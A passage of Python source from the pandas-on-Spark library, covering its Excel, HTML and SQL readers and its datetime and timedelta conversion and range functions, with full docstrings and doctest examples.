pd.DataFrame) -> pd.DataFrame:\n pdf = pd.concat([pd_read_excel(bin, sn=sn) for bin in pdf[pdf.columns[0]]])\n\n reset_index = pdf.reset_index()\n for name, col in reset_index.items():\n dt = col.dtype\n if is_datetime64_dtype(dt) or is_datetime64tz_dtype(dt):\n continue\n reset_index[name] = col.replace({np.nan: None})\n pdf = reset_index\n\n # Just positionally map the column names to given schema's.\n return pdf.rename(columns=dict(zip(pdf.columns, return_schema.names)))\n\n sdf = (\n default_session()\n .read.format(\"binaryFile\")\n .load(io)\n .select(\"content\")\n .mapInPandas(lambda iterator: map(output_func, iterator), schema=return_schema)\n )\n\n return DataFrame(psdf._internal.with_new_sdf(sdf))\n\n if isinstance(pdf_or_psers, dict):\n return {\n sn: read_excel_on_spark(pdf_or_pser, sn) for sn, pdf_or_pser in pdf_or_psers.items()\n }\n else:\n return read_excel_on_spark(pdf_or_psers, sheet_name)\n\n\ndef read_html(\n io: Union[str, Any],\n match: str = \".+\",\n flavor: Optional[str] = None,\n header: Optional[Union[int, List[int]]] = None,\n index_col: Optional[Union[int, List[int]]] = None,\n skiprows: Optional[Union[int, List[int], slice]] = None,\n attrs: Optional[Dict[str, str]] = None,\n parse_dates: bool = False,\n thousands: str = \",\",\n encoding: Optional[str] = None,\n decimal: str = \".\",\n converters: Optional[Dict] = None,\n 
na_values: Optional[Any] = None,\n keep_default_na: bool = True,\n displayed_only: bool = True,\n) -> List[DataFrame]:\n r\"\"\"Read HTML tables into a ``list`` of ``DataFrame`` objects.\n\n Parameters\n ----------\n io : str or file-like\n A URL, a file-like object, or a raw string containing HTML. Note that\n lxml only accepts the http, FTP and file URL protocols. If you have a\n URL that starts with ``'https'`` you might try removing the ``'s'``.\n\n match : str or compiled regular expression, optional\n The set of tables containing text matching this regex or string will be\n returned. Unless the HTML is extremely simple you will probably need to\n pass a non-empty string here. Defaults to '.+' (match any non-empty\n string). The default value will return all tables contained on a page.\n This value is converted to a regular expression so that there is\n consistent behavior between Beautiful Soup and lxml.\n\n flavor : str or None, container of strings\n The parsing engine to use. 'bs4' and 'html5lib' are synonymous with\n each other, they are both there for backwards compatibility. The\n default of ``None`` tries to use ``lxml`` to parse and if that fails it\n falls back on ``bs4`` + ``html5lib``.\n\n header : int or list-like or None, optional\n The row (or list of rows for a :class:`~ps.MultiIndex`) to use to\n make the columns headers.\n\n index_col : int or list-like or None, optional\n The column (or list of columns) to use to create the index.\n\n skiprows : int or list-like or slice or None, optional\n 0-based. Number of rows to skip after parsing the column integer. If a\n sequence of integers or a slice is given, will skip the rows indexed by\n that sequence. Note that a single element sequence means 'skip the nth\n row' whereas an integer means 'skip n rows'.\n\n attrs : dict or None, optional\n This is a dictionary of attributes that you can pass to use to identify\n the table in the HTML. These are not checked for validity before being\n passed to lxml or Beautiful Soup. However, these attributes must be\n valid HTML table attributes to work correctly. For example, ::\n\n attrs = {'id': 'table'}\n\n is a valid attribute dictionary because the 'id' HTML tag attribute is\n a valid HTML attribute for *any* HTML tag as per `this document\n `__. ::\n\n attrs = {'asdf': 'table'}\n\n is *not* a valid attribute dictionary because 'asdf' is not a valid\n HTML attribute even if it is a valid XML attribute. Valid HTML 4.01\n table attributes can be found `here\n `__. A\n working draft of the HTML 5 spec can be found `here\n `__. It contains the\n latest information on table attributes for the modern web.\n\n parse_dates : bool, optional\n See :func:`~ps.read_csv` for more details.\n\n thousands : str, optional\n Separator to use to parse thousands. Defaults to ``','``.\n\n encoding : str or None, optional\n The encoding used to decode the web page. Defaults to ``None``.``None``\n preserves the previous encoding behavior, which depends on the\n underlying parser library (e.g., the parser library will try to use\n the encoding provided by the document).\n\n decimal : str, default '.'\n Character to recognize as decimal point (example: use ',' for European\n data).\n\n converters : dict, default None\n Dict of functions for converting values in certain columns. 
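The multi-file branch of read_excel above leans on a reusable Spark pattern: load raw bytes with the binaryFile source, then parse each file with pandas inside mapInPandas. A stripped-down sketch of that pattern, with CSV bytes standing in for Excel; the glob, column names, and schema are assumptions for the demo:

import pandas as pd
from io import BytesIO
from pyspark.sql import SparkSession

spark = SparkSession.builder.getOrCreate()

def parse_files(batches):
    # Each batch is a pandas DataFrame of rows from the binaryFile source.
    for pdf in batches:
        for blob in pdf["content"]:
            yield pd.read_csv(BytesIO(blob), names=["a", "b"])  # assumed 2-column files

sdf = (
    spark.read.format("binaryFile")
    .load("/data/csvs/*.csv")         # placeholder glob
    .select("content")
    .mapInPandas(parse_files, schema="a long, b long")
)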
Keys can\n either be integers or column labels, values are functions that take one\n input argument, the cell (not column) content, and return the\n transformed content.\n\n na_values : iterable, default None\n Custom NA values\n\n keep_default_na : bool, default True\n If na_values are specified and keep_default_na is False the default NaN\n values are overridden, otherwise they're appended to\n\n displayed_only : bool, default True\n Whether elements with \"display: none\" should be parsed\n\n Returns\n -------\n dfs : list of DataFrames\n\n See Also\n --------\n read_csv\n DataFrame.to_html\n \"\"\"\n pdfs = pd.read_html(\n io=io,\n match=match,\n flavor=flavor,\n header=header,\n index_col=index_col,\n skiprows=skiprows,\n attrs=attrs,\n parse_dates=parse_dates,\n thousands=thousands,\n encoding=encoding,\n decimal=decimal,\n converters=converters,\n na_values=na_values,\n keep_default_na=keep_default_na,\n displayed_only=displayed_only,\n )\n return cast(List[DataFrame], [from_pandas(pdf) for pdf in pdfs])\n\n\n# TODO: add `coerce_float` and 'parse_dates' parameters\ndef read_sql_table(\n table_name: str,\n con: str,\n schema: Optional[str] = None,\n index_col: Optional[Union[str, List[str]]] = None,\n columns: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"\n Read SQL database table into a DataFrame.\n\n Given a table name and a JDBC URI, returns a DataFrame.\n\n Parameters\n ----------\n table_name : str\n Name of SQL table in database.\n con : str\n A JDBC URI could be provided as str.\n\n .. note:: The URI must be JDBC URI instead of Python's database URI.\n\n schema : str, default None\n Name of SQL schema in database to query (if database flavor\n supports this). Uses default schema if None (default).\n index_col : str or list of str, optional, default: None\n Column(s) to set as index(MultiIndex).\n columns : list, default None\n List of column names to select from SQL table.\n options : dict\n All other options passed directly into Spark's JDBC data source.\n\n Returns\n -------\n DataFrame\n A SQL table is returned as two-dimensional data structure with labeled\n axes.\n\n See Also\n --------\n read_sql_query : Read SQL query into a DataFrame.\n read_sql : Read SQL query or database table into a DataFrame.\n\n Examples\n --------\n >>> ps.read_sql_table('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n reader = default_session().read\n reader.option(\"dbtable\", table_name)\n reader.option(\"url\", con)\n if schema is not None:\n reader.schema(schema)\n reader.options(**options)\n sdf = reader.format(\"jdbc\").load()\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n psdf: DataFrame = DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n if columns is not None:\n if isinstance(columns, str):\n columns = [columns]\n psdf = psdf[columns]\n return psdf\n\n\n# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters\ndef read_sql_query(\n sql: str, con: str, index_col: Optional[Union[str, List[str]]] = None, **options: Any\n) -> DataFrame:\n \"\"\"Read SQL query into a DataFrame.\n\n Returns a DataFrame corresponding to the result set of the query\n string. Optionally provide an `index_col` parameter to use one of the\n columns as the index, otherwise default index will be used.\n\n .. 
note:: Some database might hit the issue of Spark: SPARK-27596\n\n Parameters\n ----------\n sql : string SQL query\n SQL query to be executed.\n con : str\n A JDBC URI could be provided as str.\n\n .. note:: The URI must be JDBC URI instead of Python's database URI.\n\n index_col : string or list of strings, optional, default: None\n Column(s) to set as index(MultiIndex).\n options : dict\n All other options passed directly into Spark's JDBC data source.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n read_sql_table : Read SQL database table into a DataFrame.\n read_sql\n\n Examples\n --------\n >>> ps.read_sql_query('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n reader = default_session().read\n reader.option(\"query\", sql)\n reader.option(\"url\", con)\n reader.options(**options)\n sdf = reader.format(\"jdbc\").load()\n index_spark_columns, index_names = _get_index_map(sdf, index_col)\n return DataFrame(\n InternalFrame(\n spark_frame=sdf, index_spark_columns=index_spark_columns, index_names=index_names\n )\n )\n\n\n# TODO: add `coerce_float`, `params`, and 'parse_dates' parameters\ndef read_sql(\n sql: str,\n con: str,\n index_col: Optional[Union[str, List[str]]] = None,\n columns: Optional[Union[str, List[str]]] = None,\n **options: Any,\n) -> DataFrame:\n \"\"\"\n Read SQL query or database table into a DataFrame.\n\n This function is a convenience wrapper around ``read_sql_table`` and\n ``read_sql_query`` (for backward compatibility). It will delegate\n to the specific function depending on the provided input. A SQL query\n will be routed to ``read_sql_query``, while a database table name will\n be routed to ``read_sql_table``. Note that the delegated function might\n have more specific notes about their functionality not listed here.\n\n .. note:: Some database might hit the issue of Spark: SPARK-27596\n\n Parameters\n ----------\n sql : string\n SQL query to be executed or a table name.\n con : str\n A JDBC URI could be provided as str.\n\n .. 
note:: The URI must be JDBC URI instead of Python's database URI.\n\n index_col : string or list of strings, optional, default: None\n Column(s) to set as index(MultiIndex).\n columns : list, default: None\n List of column names to select from SQL table (only used when reading\n a table).\n options : dict\n All other options passed directly into Spark's JDBC data source.\n\n Returns\n -------\n DataFrame\n\n See Also\n --------\n read_sql_table : Read SQL database table into a DataFrame.\n read_sql_query : Read SQL query into a DataFrame.\n\n Examples\n --------\n >>> ps.read_sql('table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n >>> ps.read_sql('SELECT * FROM table_name', 'jdbc:postgresql:db_name') # doctest: +SKIP\n \"\"\"\n if \"options\" in options and isinstance(options.get(\"options\"), dict) and len(options) == 1:\n options = options.get(\"options\")\n\n striped = sql.strip()\n if \" \" not in striped: # TODO: identify the table name or not more precisely.\n return read_sql_table(sql, con, index_col=index_col, columns=columns, **options)\n else:\n return read_sql_query(sql, con, index_col=index_col, **options)\n\n\n@no_type_check\ndef to_datetime(\n arg,\n errors: str = \"raise\",\n format: Optional[str] = None,\n unit: Optional[str] = None,\n infer_datetime_format: bool = False,\n origin: str = \"unix\",\n):\n \"\"\"\n Convert argument to datetime.\n\n Parameters\n ----------\n arg : integer, float, string, datetime, list, tuple, 1-d array, Series\n or DataFrame/dict-like\n\n errors : {'ignore', 'raise', 'coerce'}, default 'raise'\n\n - If 'raise', then invalid parsing will raise an exception\n - If 'coerce', then invalid parsing will be set as NaT\n - If 'ignore', then invalid parsing will return the input\n format : string, default None\n strftime to parse time, eg \"%d/%m/%Y\", note that \"%f\" will parse\n all the way up to nanoseconds.\n unit : string, default None\n unit of the arg (D,s,ms,us,ns) denote the unit, which is an\n integer or float number. This will be based off the origin.\n Example, with unit='ms' and origin='unix' (the default), this\n would calculate the number of milliseconds to the unix epoch start.\n infer_datetime_format : boolean, default False\n If True and no `format` is given, attempt to infer the format of the\n datetime strings, and if it can be inferred, switch to a faster\n method of parsing them. In some cases this can increase the parsing\n speed by ~5-10x.\n origin : scalar, default 'unix'\n Define the reference date. The numeric values would be parsed as number\n of units (defined by `unit`) since this reference date.\n\n - If 'unix' (or POSIX) time; origin is set to 1970-01-01.\n - If 'julian', unit must be 'D', and origin is set to beginning of\n Julian Calendar. Julian day number 0 is assigned to the day starting\n at noon on January 1, 4713 BC.\n - If Timestamp convertible, origin is set to Timestamp identified by\n origin.\n\n Returns\n -------\n ret : datetime if parsing succeeded.\n Return type depends on input:\n\n - list-like: DatetimeIndex\n - Series: Series of datetime64 dtype\n - scalar: Timestamp\n\n In case when it is not possible to return designated types (e.g. when\n any element of input is before Timestamp.min or after Timestamp.max)\n return will have datetime.datetime type (or corresponding\n array/Series).\n\n Examples\n --------\n Assembling a datetime from multiple columns of a DataFrame. 
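The table-versus-query routing in read_sql above is just a whitespace test on the trimmed string. A tiny sketch of the same heuristic; simplified, it mirrors only the dispatch, not the JDBC read itself:

def route_sql(sql: str) -> str:
    # No whitespace after stripping -> treat as a bare table name,
    # otherwise assume a full SQL query (same rule as read_sql above).
    return "read_sql_table" if " " not in sql.strip() else "read_sql_query"

print(route_sql("my_table"))                # read_sql_table
print(route_sql("SELECT * FROM my_table"))  # read_sql_query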
The keys can be\n common abbreviations like ['year', 'month', 'day', 'minute', 'second',\n 'ms', 'us', 'ns']) or plurals of the same\n\n >>> df = ps.DataFrame({'year': [2015, 2016],\n ... 'month': [2, 3],\n ... 'day': [4, 5]})\n >>> ps.to_datetime(df)\n 0 2015-02-04\n 1 2016-03-05\n dtype: datetime64[ns]\n\n If a date does not meet the `timestamp limitations\n `_, passing errors='ignore'\n will return the original input instead of raising any exception.\n\n Passing errors='coerce' will force an out-of-bounds date to NaT,\n in addition to forcing non-dates (or non-parseable dates) to NaT.\n\n >>> ps.to_datetime('13000101', format='%Y%m%d', errors='ignore') # doctest: +SKIP\n datetime.datetime(1300, 1, 1, 0, 0)\n >>> ps.to_datetime('13000101', format='%Y%m%d', errors='coerce')\n NaT\n\n Passing infer_datetime_format=True can often-times speedup a parsing\n if its not an ISO8601 format exactly, but in a regular format.\n\n >>> s = ps.Series(['3/11/2000', '3/12/2000', '3/13/2000'] * 1000)\n >>> s.head()\n 0 3/11/2000\n 1 3/12/2000\n 2 3/13/2000\n 3 3/11/2000\n 4 3/12/2000\n dtype: object\n\n >>> import timeit\n >>> timeit.timeit(\n ... lambda: repr(ps.to_datetime(s, infer_datetime_format=True)),\n ... number = 1) # doctest: +SKIP\n 0.35832712500000063\n\n >>> timeit.timeit(\n ... lambda: repr(ps.to_datetime(s, infer_datetime_format=False)),\n ... number = 1) # doctest: +SKIP\n 0.8895321660000004\n\n Using a unix epoch time\n\n >>> ps.to_datetime(1490195805, unit='s')\n Timestamp('2017-03-22 15:16:45')\n >>> ps.to_datetime(1490195805433502912, unit='ns')\n Timestamp('2017-03-22 15:16:45.433502912')\n\n Using a non-unix epoch origin\n\n >>> ps.to_datetime([1, 2, 3], unit='D', origin=pd.Timestamp('1960-01-01'))\n DatetimeIndex(['1960-01-02', '1960-01-03', '1960-01-04'], dtype='datetime64[ns]', freq=None)\n \"\"\"\n\n # mappings for assembling units\n # From pandas: pandas.core.tools.datetimes\n _unit_map = {\n \"year\": \"year\",\n \"years\": \"year\",\n \"month\": \"month\",\n \"months\": \"month\",\n \"day\": \"day\",\n \"days\": \"day\",\n \"hour\": \"h\",\n \"hours\": \"h\",\n \"minute\": \"m\",\n \"minutes\": \"m\",\n \"second\": \"s\",\n \"seconds\": \"s\",\n \"ms\": \"ms\",\n \"millisecond\": \"ms\",\n \"milliseconds\": \"ms\",\n \"us\": \"us\",\n \"microsecond\": \"us\",\n \"microseconds\": \"us\",\n }\n\n def pandas_to_datetime(\n pser_or_pdf: Union[pd.DataFrame, pd.Series], cols: Optional[List[str]] = None\n ) -> Series[np.datetime64]:\n if isinstance(pser_or_pdf, pd.DataFrame):\n pser_or_pdf = pser_or_pdf[cols]\n return pd.to_datetime(\n pser_or_pdf,\n errors=errors,\n format=format,\n unit=unit,\n infer_datetime_format=infer_datetime_format,\n origin=origin,\n )\n\n if isinstance(arg, Series):\n return arg.pandas_on_spark.transform_batch(pandas_to_datetime)\n if isinstance(arg, DataFrame):\n unit = {k: _unit_map[k.lower()] for k in arg.keys() if k.lower() in _unit_map}\n unit_rev = {v: k for k, v in unit.items()}\n list_cols = [unit_rev[\"year\"], unit_rev[\"month\"], unit_rev[\"day\"]]\n for u in [\"h\", \"m\", \"s\", \"ms\", \"us\"]:\n value = unit_rev.get(u)\n if value is not None and value in arg:\n list_cols.append(value)\n\n psdf = arg[list_cols]\n return psdf.pandas_on_spark.transform_batch(pandas_to_datetime, list_cols)\n return pd.to_datetime(\n arg,\n errors=errors,\n format=format,\n unit=unit,\n infer_datetime_format=infer_datetime_format,\n origin=origin,\n )\n\n\ndef date_range(\n start: Union[str, Any] = None,\n end: Union[str, Any] = None,\n periods: Optional[int] = 
None,\n freq: Optional[Union[str, DateOffset]] = None,\n tz: Optional[Union[str, tzinfo]] = None,\n normalize: bool = False,\n name: Optional[str] = None,\n inclusive: str = \"both\",\n **kwargs: Any,\n) -> DatetimeIndex:\n \"\"\"\n Return a fixed frequency DatetimeIndex.\n\n Parameters\n ----------\n start : str or datetime-like, optional\n Left bound for generating dates.\n end : str or datetime-like, optional\n Right bound for generating dates.\n periods : int, optional\n Number of periods to generate.\n freq : str or DateOffset, default 'D'\n Frequency strings can have multiples, e.g. '5H'.\n tz : str or tzinfo, optional\n Time zone name for returning localized DatetimeIndex, for example\n 'Asia/Hong_Kong'. By default, the resulting DatetimeIndex is\n time zone naive.\n normalize : bool, default False\n Normalize start/end dates to midnight before generating date range.\n name : str, default None\n Name of the resulting DatetimeIndex.\n inclusive : {\"both\", \"neither\", \"left\", \"right\"}, default \"both\"\n Include boundaries; Whether to set each bound as closed or open.\n\n .. versionadded:: 4.0.0\n\n **kwargs\n For compatibility. Has no effect on the result.\n\n Returns\n -------\n rng : DatetimeIndex\n\n See Also\n --------\n DatetimeIndex : An immutable container for datetimes.\n\n Notes\n -----\n Of the four parameters ``start``, ``end``, ``periods``, and ``freq``,\n exactly three must be specified. If ``freq`` is omitted, the resulting\n ``DatetimeIndex`` will have ``periods`` linearly spaced elements between\n ``start`` and ``end`` (closed on both sides).\n\n To learn more about the frequency strings, please see `this link\n `__.\n\n Examples\n --------\n **Specifying the values**\n\n The next four examples generate the same `DatetimeIndex`, but vary\n the combination of `start`, `end` and `periods`.\n\n Specify `start` and `end`, with the default daily frequency.\n\n >>> ps.date_range(start='1/1/2018', end='1/08/2018') # doctest: +SKIP\n DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',\n '2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],\n dtype='datetime64[ns]', freq=None)\n\n Specify `start` and `periods`, the number of periods (days).\n\n >>> ps.date_range(start='1/1/2018', periods=8) # doctest: +SKIP\n DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',\n '2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],\n dtype='datetime64[ns]', freq=None)\n\n Specify `end` and `periods`, the number of periods (days).\n\n >>> ps.date_range(end='1/1/2018', periods=8) # doctest: +SKIP\n DatetimeIndex(['2017-12-25', '2017-12-26', '2017-12-27', '2017-12-28',\n '2017-12-29', '2017-12-30', '2017-12-31', '2018-01-01'],\n dtype='datetime64[ns]', freq=None)\n\n Specify `start`, `end`, and `periods`; the frequency is generated\n automatically (linearly spaced).\n\n >>> ps.date_range(\n ... start='2018-04-24', end='2018-04-27', periods=3\n ... 
) # doctest: +SKIP\n DatetimeIndex(['2018-04-24 00:00:00', '2018-04-25 12:00:00',\n '2018-04-27 00:00:00'],\n dtype='datetime64[ns]', freq=None)\n\n **Other Parameters**\n\n Changed the `freq` (frequency) to ``'M'`` (month end frequency).\n\n >>> ps.date_range(start='1/1/2018', periods=5, freq='M') # doctest: +SKIP\n DatetimeIndex(['2018-01-31', '2018-02-28', '2018-03-31', '2018-04-30',\n '2018-05-31'],\n dtype='datetime64[ns]', freq=None)\n\n Multiples are allowed\n\n >>> ps.date_range(start='1/1/2018', periods=5, freq='3M') # doctest: +SKIP\n DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',\n '2019-01-31'],\n dtype='datetime64[ns]', freq=None)\n\n `freq` can also be specified as an Offset object.\n\n >>> ps.date_range(\n ... start='1/1/2018', periods=5, freq=pd.offsets.MonthEnd(3)\n ... ) # doctest: +SKIP\n DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',\n '2019-01-31'],\n dtype='datetime64[ns]', freq=None)\n\n `inclusive` controls whether to include `start` and `end` that are on the\n boundary. The default includes boundary points on either end.\n\n >>> ps.date_range(\n ... start='2017-01-01', end='2017-01-04', inclusive=\"both\"\n ... ) # doctest: +NORMALIZE_WHITESPACE\n DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03', '2017-01-04'],\n dtype='datetime64[ns]', freq=None)\n\n Use ``inclusive='left'`` to exclude `end` if it falls on the boundary.\n\n >>> ps.date_range(\n ... start='2017-01-01', end='2017-01-04', inclusive='left'\n ... ) # doctest: +NORMALIZE_WHITESPACE\n DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03'], dtype='datetime64[ns]', freq=None)\n\n Use ``inclusive='right'`` to exclude `start` if it falls on the boundary.\n\n >>> ps.date_range(\n ... start='2017-01-01', end='2017-01-04', inclusive='right'\n ... ) # doctest: +NORMALIZE_WHITESPACE\n DatetimeIndex(['2017-01-02', '2017-01-03', '2017-01-04'], dtype='datetime64[ns]', freq=None)\n \"\"\"\n assert freq not in [\"N\", \"ns\"], \"nanoseconds is not supported\"\n assert tz is None, \"Localized DatetimeIndex is not supported\"\n\n return cast(\n DatetimeIndex,\n ps.from_pandas(\n pd.date_range(\n start=start,\n end=end,\n periods=periods,\n freq=freq,\n tz=tz,\n normalize=normalize,\n name=name,\n inclusive=inclusive,\n **kwargs,\n )\n ),\n )\n\n\n@no_type_check\ndef to_timedelta(\n arg,\n unit: Optional[str] = None,\n errors: str = \"raise\",\n):\n \"\"\"\n Convert argument to timedelta.\n\n Parameters\n ----------\n arg : str, timedelta, list-like or Series\n The data to be converted to timedelta.\n unit : str, optional\n Denotes the unit of the arg for numeric `arg`. 
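Because `date_range` above materializes `pd.date_range` on the driver and wraps the result with `ps.from_pandas`, the whole index is built in driver memory first. A minimal sketch of the three-of-four parameter rule (dates are illustrative):

import pyspark.pandas as ps

idx1 = ps.date_range(start="2018-01-01", periods=4, freq="D")
idx2 = ps.date_range(start="2018-01-01", end="2018-01-04")  # freq defaults to daily
# freq="N"/"ns" or a tz argument would trip the asserts in the implementation.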
Defaults to ``\"ns\"``.\n\n Possible values:\n * 'W'\n * 'D' / 'days' / 'day'\n * 'hours' / 'hour' / 'hr' / 'h'\n * 'm' / 'minute' / 'min' / 'minutes' / 'T'\n * 'S' / 'seconds' / 'sec' / 'second'\n * 'ms' / 'milliseconds' / 'millisecond' / 'milli' / 'millis' / 'L'\n * 'us' / 'microseconds' / 'microsecond' / 'micro' / 'micros' / 'U'\n * 'ns' / 'nanoseconds' / 'nano' / 'nanos' / 'nanosecond' / 'N'\n\n Must not be specified when `arg` contains strings and ``errors=\"raise\"``.\n errors : {'ignore', 'raise', 'coerce'}, default 'raise'\n - If 'raise', then invalid parsing will raise an exception.\n - If 'coerce', then invalid parsing will be set as NaT.\n - If 'ignore', then invalid parsing will return the input.\n\n Returns\n -------\n ret : timedelta64, TimedeltaIndex or Series of timedelta64 if parsing succeeded.\n\n See Also\n --------\n DataFrame.astype : Cast argument to a specified dtype.\n to_datetime : Convert argument to datetime.\n\n Notes\n -----\n If the precision is higher than nanoseconds, the precision of the duration is\n truncated to nanoseconds for string inputs.\n\n Examples\n --------\n Parsing a single string to a Timedelta:\n\n >>> ps.to_timedelta('1 days 06:05:01.00003')\n Timedelta('1 days 06:05:01.000030')\n >>> ps.to_timedelta('15.5us') # doctest: +SKIP\n Timedelta('0 days 00:00:00.000015500')\n\n Parsing a list or array of strings:\n\n >>> ps.to_timedelta(['1 days 06:05:01.00003', '15.5us', 'nan']) # doctest: +SKIP\n TimedeltaIndex(['1 days 06:05:01.000030', '0 days 00:00:00.000015500', NaT],\n dtype='timedelta64[ns]', freq=None)\n\n Converting numbers by specifying the `unit` keyword argument:\n\n >>> ps.to_timedelta(np.arange(5), unit='s') # doctest: +SKIP\n TimedeltaIndex(['0 days 00:00:00', '0 days 00:00:01', '0 days 00:00:02',\n '0 days 00:00:03', '0 days 00:00:04'],\n dtype='timedelta64[ns]', freq=None)\n >>> ps.to_timedelta(np.arange(5), unit='d') # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['0 days', '1 days', '2 days', '3 days', '4 days'],\n dtype='timedelta64[ns]', freq=None)\n \"\"\"\n\n def pandas_to_timedelta(pser: pd.Series) -> np.timedelta64:\n return pd.to_timedelta(\n arg=pser,\n unit=unit,\n errors=errors,\n )\n\n if isinstance(arg, Series):\n return arg.transform(pandas_to_timedelta)\n\n else:\n return pd.to_timedelta(\n arg=arg,\n unit=unit,\n errors=errors,\n )\n\n\ndef timedelta_range(\n start: Union[str, Any] = None,\n end: Union[str, Any] = None,\n periods: Optional[int] = None,\n freq: Optional[Union[str, DateOffset]] = None,\n name: Optional[str] = None,\n closed: Optional[str] = None,\n) -> TimedeltaIndex:\n \"\"\"\n Return a fixed frequency TimedeltaIndex, with day as the default frequency.\n\n Parameters\n ----------\n start : str or timedelta-like, optional\n Left bound for generating timedeltas.\n end : str or timedelta-like, optional\n Right bound for generating timedeltas.\n periods : int, optional\n Number of periods to generate.\n freq : str or DateOffset, default 'D'\n Frequency strings can have multiples, e.g. '5H'.\n name : str, default None\n Name of the resulting TimedeltaIndex.\n closed : {None, 'left', 'right'}, optional\n Make the interval closed with respect to the given frequency to\n the 'left', 'right', or both sides (None, the default).\n\n Returns\n -------\n TimedeltaIndex\n\n Notes\n -----\n Of the four parameters ``start``, ``end``, ``periods``, and ``freq``,\n exactly three must be specified. 
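For Series input, the `to_timedelta` implementation above applies `pd.to_timedelta` per batch via `transform`; anything else falls straight through to pandas. A minimal sketch (values are illustrative; `unit` applies to numeric input, per the docstring):

import numpy as np
import pyspark.pandas as ps

psser = ps.Series([1, 2, 3])
ps.to_timedelta(psser, unit="d")         # distributed: pandas applied per batch
ps.to_timedelta(np.arange(3), unit="s")  # non-Series input: plain pandas result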
If ``freq`` is omitted, the resulting\n ``TimedeltaIndex`` will have ``periods`` linearly spaced elements between\n ``start`` and ``end`` (closed on both sides).\n\n To learn more about the frequency strings, please see `this link`__.\n\n Examples\n --------\n >>> ps.timedelta_range(start='1 day', periods=4) # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['1 days', '2 days', '3 days', '4 days'], dtype='timedelta64[ns]', freq=None)\n\n The closed parameter specifies which endpoint is included.\n The default behavior is to include both endpoints.\n\n >>> ps.timedelta_range(start='1 day', periods=4, closed='right')\n ... # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['2 days', '3 days', '4 days'], dtype='timedelta64[ns]', freq=None)\n\n The freq parameter specifies the frequency of the TimedeltaIndex.\n Only fixed frequencies can be passed; non-fixed frequencies such as 'M' (month end) will raise.\n\n >>> ps.timedelta_range(start='1 day', end='2 days', freq='6H')\n ... # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['1 days 00:00:00', '1 days 06:00:00', '1 days 12:00:00',\n '1 days 18:00:00', '2 days 00:00:00'],\n dtype='timedelta64[ns]', freq=None)\n\n Specify start, end, and periods; the frequency is generated automatically (linearly spaced).\n\n >>> ps.timedelta_range(start='1 day', end='5 days', periods=4)\n ... # doctest: +NORMALIZE_WHITESPACE\n TimedeltaIndex(['1 days 00:00:00', '2 days 08:00:00', '3 days 16:00:00',\n '5 days 00:00:00'],\n dtype='timedelta64[ns]', freq=None)\n \"\"\"\n assert freq not in [\"N\", \"ns\"], \"nanoseconds is not supported\"\n\n return cast(\n TimedeltaIndex,\n ps.from_pandas(\n pd.timedelta_range(\n start=start,\n end=end,\n periods=periods,\n freq=freq,\n name=name,\n closed=closed,\n )\n ),\n )\n\n\ndef get_dummies(\n data: Union[DataFrame, Series],\n prefix: Optional[Union[str, List[str], Dict[str, str]]] = None,\n prefix_sep: str = \"_\",\n dummy_na: bool = False,\n columns: Optional[Union[Name, List[Name]]] = None,\n sparse: bool = False,\n drop_first: bool = False,\n dtype: Optional[Union[str, Dtype]] = None,\n) -> DataFrame:\n \"\"\"\n Convert categorical variable into dummy/indicator variables, also\n known as one hot encoding.\n\n Parameters\n ----------\n data : array-like, Series, or DataFrame\n prefix : string, list of strings, or dict of strings, default None\n String to append to DataFrame column names.\n Pass a list with length equal to the number of columns\n when calling get_dummies on a DataFrame. Alternatively, `prefix`\n can be a dictionary mapping column names to prefixes.\n prefix_sep : string, default '_'\n If appending prefix, separator/delimiter to use. Or pass a\n list or dictionary as with `prefix`.\n dummy_na : bool, default False\n Add a column to indicate NaNs, if False NaNs are ignored.\n columns : list-like, default None\n Column names in the DataFrame to be encoded.\n If `columns` is None then all the columns with\n `object` or `category` dtype will be converted.\n sparse : bool, default False\n Whether the dummy-encoded columns should be backed by\n a :class:`SparseArray` (True) or a regular NumPy array (False).\n In pandas-on-Spark, this value must be \"False\".\n drop_first : bool, default False\n Whether to get k-1 dummies out of k categorical levels by removing the\n first level.\n dtype : dtype, default np.uint8\n Data type for new columns. 
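Like `date_range`, the `timedelta_range` shown above delegates to pandas on the driver and converts the result with `ps.from_pandas`, so only fixed frequencies survive the nanosecond assert. A short sketch:

import pyspark.pandas as ps

tdi = ps.timedelta_range(start="1 day", end="2 days", freq="6H")
# freq="N" or "ns" would fail the assert before pandas is ever called.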
